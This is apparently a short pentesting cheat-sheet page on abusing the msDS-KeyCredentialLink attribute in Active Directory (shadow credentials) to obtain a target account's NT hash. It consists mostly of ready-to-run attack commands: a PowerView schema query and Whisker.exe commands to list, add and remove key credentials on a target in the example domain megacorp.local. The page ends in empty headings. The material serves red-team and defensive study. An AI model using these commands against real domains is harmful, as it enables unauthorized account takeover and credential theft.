Key Credentials Abuse
"...if you can write to the
msDS-KeyCredentialLinkproperty of a user, you can retrieve the NT hash of that user." (Elad Shamir, ref)
That makes GenericWrite on a user effectively equal to DCSync right on that user.
Check for existence of the msDS-KeyCredentialLink property in LDAP scheme with powerview.py:
PS > Get-DomainObject -SearchBase CN=Schema,CN=Configuration,DC=megacorp,DC=local -Properties lDAPDisplayName -Where "lDAPDisplayName contains msDS-KeyCredentialLink"Whisker
List all the values of the the msDS-KeyCredentialLink attribute of a target object:
Cmd > .\Whisker.exe list /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.localAdd a new value to the msDS-KeyCredentialLink attribute of a target object:
Cmd > .\Whisker.exe add /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local /path:C:\Temp\cert.pfx /password:Passw0rd!Remove a value from the msDS-KeyCredentialLink attribute of a target object:
Cmd > .\Whisker.exe remove /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local /deviceid:00ff00ff-00ff-00ff-00ff-00ff00ff00ffClear all the values of the the msDS-KeyCredentialLink attribute of a target object:
pywhisker
Certipy
Tools
Last updated